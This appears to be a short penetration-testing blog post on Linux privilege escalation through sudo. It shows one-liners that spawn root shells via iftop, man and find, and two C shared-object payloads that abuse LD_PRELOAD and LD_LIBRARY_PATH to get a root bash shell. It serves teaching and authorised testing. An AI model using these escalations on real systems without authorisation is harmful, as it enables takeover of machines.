Sudo is one of the first things I check during priv esc on Linux, using sudo -l shows all commands that can be run as sudo.
Most of these can be abused very easily using one liners from https://gtfobins.github.io/
I’ll run a few examples of these before moving on to env_keep variables.
We can run sudo iftop then typing ! to open a command prompt followed by /bin/bash to spawn a shell
The same method can be used for man.
sudo find . -exec “/bin/bash” \; -quit is another very easy example
Nmap scan be used to execute scripts as root if given sudo permissions.
As LD_PRELOAD is set in this instance we can abuse this to create a shared object that will run before the sudo binary. For this we can use the following C code:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}Compile the C code into a binary using gcc and run sudo LD_PRELOAD=<compiled binary> <sudo binary>
It is also possible to abuse the LD_LIBRARY_PATH variable; first we can check for what libraries are called for the binary we want to abuse using ldd. Then we can compile the following C code into a binary with the same name as one of the called libraries.
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
Once the C code is compiled we can run sudo LD_LIBRARY_PATH=<directory for compiled binary> <sudo binary>
Dan Rigby PenTesting 